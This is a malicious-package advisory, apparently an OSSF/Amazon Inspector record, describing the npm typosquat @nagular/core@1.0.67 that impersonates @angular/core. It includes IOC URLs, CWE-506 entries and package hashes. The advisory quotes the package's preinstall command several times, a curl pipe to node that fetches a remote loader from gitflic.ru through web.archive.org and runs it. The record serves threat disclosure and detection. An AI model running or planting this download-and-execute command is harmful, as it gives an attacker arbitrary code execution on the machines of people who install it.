@nagular/core@1.0.67 impersonates @angular/core (by name only; its code is an unrelated library described as "Core Libs") and adds a preinstall script that runs on npm install and pipes a remotely hosted loader into node: curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node. This runs attacker-controlled JavaScript with the installing user's privileges. The npm account angularr published @nagular/core and 5 similar packages on 2026-10-03 between 06:33 and 07:23 UTC, all with the same preinstall script.
-= Per source details. Do not edit below this line.=-
The package's package.json declares a preinstall lifecycle script that runs curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node, fetching an unpinned, unverified JavaScript payload from an unrelated third-party host (gitflic.ru proxied through web.archive.org) and piping it directly to node for execution during npm install. The remote content runs with the installer's privileges before any package code is imported or reviewed, giving whoever controls that URL arbitrary code execution on every machine that installs the package. The remote path hellscripter/install-scripts and the use of an archive proxy are consistent with a hostile dropper rather than a legitimate build step. The scope name @nagular/core additionally resembles the Angular ecosystem (@angular), consistent with a typosquat lure, and the preinstall hook is the package's only functional content.
{
"iocs": {
"files": [
{
"digests": {
"sha256": "cb787a229d1987746afb2dd58d1dc48a023c6e36ac7fc8b3b509ac732aa7fe15"
},
"note": "preinstall script pipes the web.archive.org copy of gitflic.ru hellscripter/install-scripts node.js into node (@nagular/core@1.0.67).",
"paths": [
"package.json"
],
"source": "PACKAGE_ARCHIVE"
}
],
"urls": [
"https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js",
"https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js"
]
},
"malicious-packages-origins": [
{
"id": "IN-MAL-2026-020918",
"import_time": "2026-10-04T23:40:41.834205409Z",
"modified_time": "2026-10-04T23:19:36Z",
"sha256": "5ac4933487fc7ccf7161933c9d5f6965b5e1f0a3efeaf8ea5349096835008557",
"source": "amazon-inspector",
"versions": [
"1.0.67"
]
}
]
}[
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
}
]
{
"evidence_files": [
{
"path": "package.json",
"sha256": "cb787a229d1987746afb2dd58d1dc48a023c6e36ac7fc8b3b509ac732aa7fe15",
"tlsh": "01117b20dd8c5ea316c209f92cbdc8019565081b4d94fc5cf3ea040d8f5eaaf717a51d"
}
],
"package_integrity": [
{
"filename": "core-1.0.67.tgz",
"hashes": {
"sha1": "9f85f974963bed2c49a6a0c9437f9ce797f51572",
"sha512_sri": "sha512-YqA8+/Zh1yq0ImHjK32MzmvRV79p1AeatvZBmuIcUvxsC2sOfcKYNB43yvj7XhpRnfJKexXcCiokH6c3lSd3kw=="
}
}
]
}
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@nagular/core/MAL-2026-17499.json"